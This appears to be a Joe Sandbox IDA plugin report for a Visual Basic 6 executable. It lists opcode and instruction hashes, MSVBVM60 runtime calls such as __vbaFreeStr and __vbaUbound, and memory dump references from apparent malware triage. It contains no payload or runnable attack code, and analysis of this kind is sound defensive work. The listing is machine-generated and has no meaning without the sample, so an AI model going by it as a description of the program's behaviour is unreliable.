                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$List$Destruct
                                                          • String ID:
                                                          • API String ID: 3099906924-0
                                                          • Opcode ID: 9c4743fe5fd64e31a418b9edfa30fb3c5f8340ed85767d0da3274f40ffe131ff
                                                          • Instruction ID: 55d1d4e1cf81e37f60003d51b04c3a4f789bb7a794f4b5337716c0246b998d34
                                                          • Opcode Fuzzy Hash: 9c4743fe5fd64e31a418b9edfa30fb3c5f8340ed85767d0da3274f40ffe131ff
                                                          • Instruction Fuzzy Hash: ED11AAB3810118AADB56CBD4CD84EDEB77DAB48700F04825AF21BA6454EA70678CCF60
                                                          APIs
                                                          • __vbaFreeObj.MSVBVM60 ref: 00430AE6
                                                          • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00430AFE
                                                          • __vbaFreeObj.MSVBVM60 ref: 00430B0A
                                                          • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 00430B29
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Free__vba$List
                                                          • String ID:
                                                          • API String ID: 2192533141-0
                                                          • Opcode ID: d0d1fd835cd3dbb3824f0bd55a23bedf2fd187601ebe4a0b58a60a0adf17e732
                                                          • Instruction ID: c850daffb6054cbfabea4f767a34929617ee87e6d2dfeb2272f72e3ff4e3a1f1
                                                          • Opcode Fuzzy Hash: d0d1fd835cd3dbb3824f0bd55a23bedf2fd187601ebe4a0b58a60a0adf17e732
                                                          • Instruction Fuzzy Hash: FAF0F972C00109ABEF05EBD4DD85EDEB77CFF48300F44812AF622B6060EA70A608CB64
                                                          APIs
                                                          • __vbaFreeObj.MSVBVM60 ref: 0043035C
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0043036C
                                                          • __vbaFreeObj.MSVBVM60 ref: 00430378
                                                          • __vbaFreeVarList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0043039B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Free__vba$List
                                                          • String ID:
                                                          • API String ID: 2192533141-0
                                                          • Opcode ID: 2c1f03920155f9229acbc1fa31b91559145dcfe5ddf8c33a8cb8717936c6c9bb
                                                          • Instruction ID: 4c93e2681fe14d81a84a6f15358bc169b3acc17d0bad170dcb720031593788ed
                                                          • Opcode Fuzzy Hash: 2c1f03920155f9229acbc1fa31b91559145dcfe5ddf8c33a8cb8717936c6c9bb
                                                          • Instruction Fuzzy Hash: 72F0F9728001189BEB09DBD4DD99EFEB378FF48304F48412DF606B6061E6706618CB64
                                                          APIs
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042E47C
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 0042E486
                                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042E496
                                                          • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042E4B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$FreeList$DestructUnlock
                                                          • String ID:
                                                          • API String ID: 2365061390-0
                                                          • Opcode ID: b976eeb8b01bf6bbd2b1c67b0b601db7319691de59a6152fcc1288b504aa0444
                                                          • Instruction ID: 1c74f7a615ce89783975195d616b0dce286544e679f7ab07a05835a10af5f4c0
                                                          • Opcode Fuzzy Hash: b976eeb8b01bf6bbd2b1c67b0b601db7319691de59a6152fcc1288b504aa0444
                                                          • Instruction Fuzzy Hash: 7BF03AB2900219AFEF04DBD0DD49FFE7338FB44705F48402DF606A6451E6705649CB68
                                                          APIs
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041B663
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041B67F
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B68B
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041B697
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$DestructList
                                                          • String ID:
                                                          • API String ID: 1934303848-0
                                                          • Opcode ID: 4c381e20840e96d985a5c350125a91bb2dcb7d6321214d76d9095062b82743bf
                                                          • Instruction ID: e5d0b8a3776a3dba3310019961fdc3eea14e2a68a3adb64687ad0a5057425e60
                                                          • Opcode Fuzzy Hash: 4c381e20840e96d985a5c350125a91bb2dcb7d6321214d76d9095062b82743bf
                                                          • Instruction Fuzzy Hash: 9BF0F8768001099BEF09CBD0CE58EEE7778FB44301F04812DE603AA0A4EB702609CB64
                                                          APIs
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00427C68
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 00427C72
                                                          • __vbaFreeStr.MSVBVM60 ref: 00427C7B
                                                          • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00427C8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$DestructListUnlock
                                                          • String ID:
                                                          • API String ID: 676089279-0
                                                          • Opcode ID: 31bf1b6fe516328315580394144083e8d644e915f7248a1d471ef65f966afb87
                                                          • Instruction ID: 5e9e23fe7762367278ee47cc1a76238bf94153f7d4dabd616f12de43420dc81b
                                                          • Opcode Fuzzy Hash: 31bf1b6fe516328315580394144083e8d644e915f7248a1d471ef65f966afb87
                                                          • Instruction Fuzzy Hash: 99E0E575C00109AFEB09DBD0ED98BED7BBCEB44305F40805AF612A61A0EA746609CB24
                                                          APIs
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042496E
                                                          • __vbaFreeStr.MSVBVM60 ref: 00424977
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00424987
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00424996
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$DestructList
                                                          • String ID:
                                                          • API String ID: 1934303848-0
                                                          • Opcode ID: 8f0de291f7086f06beb718ad37c345000d877fbadf8f12b1ad456e23a12260e4
                                                          • Instruction ID: 0f8b304471d1c596ba7ebdd0e0d0cd925b6ca17a6b88493d71dc5e45ae08b694
                                                          • Opcode Fuzzy Hash: 8f0de291f7086f06beb718ad37c345000d877fbadf8f12b1ad456e23a12260e4
                                                          • Instruction Fuzzy Hash: 4FE01A719001099FEF00CBD0EE49AED7778EF40301F004025E502E55A0EB306A09CB64
                                                          APIs
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 004261A5
                                                          • __vbaUbound.MSVBVM60(00000001,00000000), ref: 004261B3
                                                          • __vbaUbound.MSVBVM60(00000001,00000000,00000000), ref: 004261D7
                                                          • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,00000000), ref: 004261F6
                                                          • __vbaUbound.MSVBVM60(00000001,00000000), ref: 0042620C
                                                          • __vbaI2I4.MSVBVM60 ref: 0042621D
                                                          • __vbaVarCopy.MSVBVM60 ref: 00426344
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426523
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426540
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426585
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004265A2
                                                          • __vbaVarCopy.MSVBVM60 ref: 004265C6
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 004265EC
                                                          • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001), ref: 0042660B
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 00426621
                                                          • __vbaI2I4.MSVBVM60 ref: 00426632
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00426E73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Ubound$Error$BoundsGenerate$CopyRedim$Overflow
                                                          • String ID: 1
                                                          • API String ID: 2848970627-2212294583
                                                          • Opcode ID: 245bf086c911639528bcd9db943c0ef147268c9c95a86ee915a36599f5c45521
                                                          • Instruction ID: c4b28c7e0f72d7d28673526e39e426e6e2863f055672493c3652e105557e4f7a
                                                          • Opcode Fuzzy Hash: 245bf086c911639528bcd9db943c0ef147268c9c95a86ee915a36599f5c45521
                                                          • Instruction Fuzzy Hash: 2431B270A05128DBCB64DF84E6946EDBBB2FF54304F6541C9C44A6B258C7B8AEC1CF49